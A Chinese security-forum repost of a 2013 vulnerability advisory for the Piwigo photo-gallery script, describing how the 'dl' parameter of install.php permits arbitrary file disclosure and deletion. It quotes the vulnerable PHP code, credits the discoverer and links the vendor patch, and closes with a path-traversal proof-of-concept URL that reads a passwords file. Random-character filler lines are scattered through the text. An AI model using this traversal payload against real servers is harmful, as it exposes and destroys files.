中国网络渗透测试联盟
标题:
Piwigo任意文件泄露和任意文件删除漏洞
[打印本页]
作者:
admin
时间:
2013-3-14 20:15
标题:
Piwigo任意文件泄露和任意文件删除漏洞
Piwigo是用PHP编写的相册脚本。
* r* O1 F0 L2 u/ |0 i! G; S
. o7 o' A( u: C3 B# A
Piwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值,在实现上存在安全漏洞,攻击者可利用这些漏洞查看受影响计算机上的任意文件,删除受影响应用上下文内的任意文件。
" X0 ~% U8 H4 ?( Y
====================================================================
?( g3 r) W) P; ~3 F
/install.php:
; l1 b( ]3 h# d
-------------
. e% a8 d2 l3 P3 D
113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
k" h! b3 @. o! b5 e
114: {
' }2 x9 }. W; T4 |1 X8 V
115: $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
8 ~# K9 I9 t' o
116: header('Cache-Control: no-cache, must-revalidate');
7 q9 X: U" z ? J
117: header('Pragma: no-cache');
# m( O5 B& u+ P$ R8 @0 S; L
118: header('Content-Disposition: attachment; filename="database.inc.php"');
( w* t2 \0 B9 a1 J1 v- X
119: header('Content-Transfer-Encoding: binary');
" S! F: x" V1 o
120: header('Content-Length: '.filesize($filename));
$ k2 h A! \; A$ ]' \7 v: u
121: echo file_get_contents($filename);
- Q. ]1 M. W: c, l7 O" `& m/ v
122: unlink($filename);
% y D j5 d3 I" Q% |% s
123: exit();
$ @4 o: B2 C: q& q1 [! n( s4 F
124: }
4 t: `& h, N# s9 q
====================================================================
6 L& u0 ?1 o2 K2 Q$ S, D
* B2 W- A/ T8 Z# v
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
$ H# j3 g- |7 W. c7 S+ v" N4 D# D
Apache 2.4.2 (Win32)
3 d F& I3 W- Y4 N/ O
PHP 5.4.4
9 r; F" t2 c: n* F7 h9 d6 ]" @# S
MySQL 5.5.25a
) ~" @3 Z' R* }1 c3 C' a" B9 i
5 |: k' h/ x0 }+ [2 ~, t; ^* Z. {
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
3 N* a$ }! x2 u$ X9 ~$ t8 b1 c
@zeroscience
: q( I% C; H ^/ }% T) |
' P/ H- _+ r: @0 ]
Advisory ID: ZSL-2013-5127
4 r; o* e+ j: t* z/ k6 @3 B
Advisory URL:
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
5 Z" Z2 ?. h6 Q. k
Vendor Patch:
http://piwigo.org/bugs/view.php?id=2843
0 u M9 \+ N$ b/ ` b" M8 h
% H2 V5 _ @3 p! `; t* w
15.02.2013
0 L" j+ _; l. ?7 G' K9 Q
/ g( I' F# H6 i& t) @5 k
--
& Y. j. M" m. x" ^ ^0 i
http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt
6 l4 ~) U2 h0 d X
2 _0 n2 G9 r' _ k. J6 ]8 Q, V
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2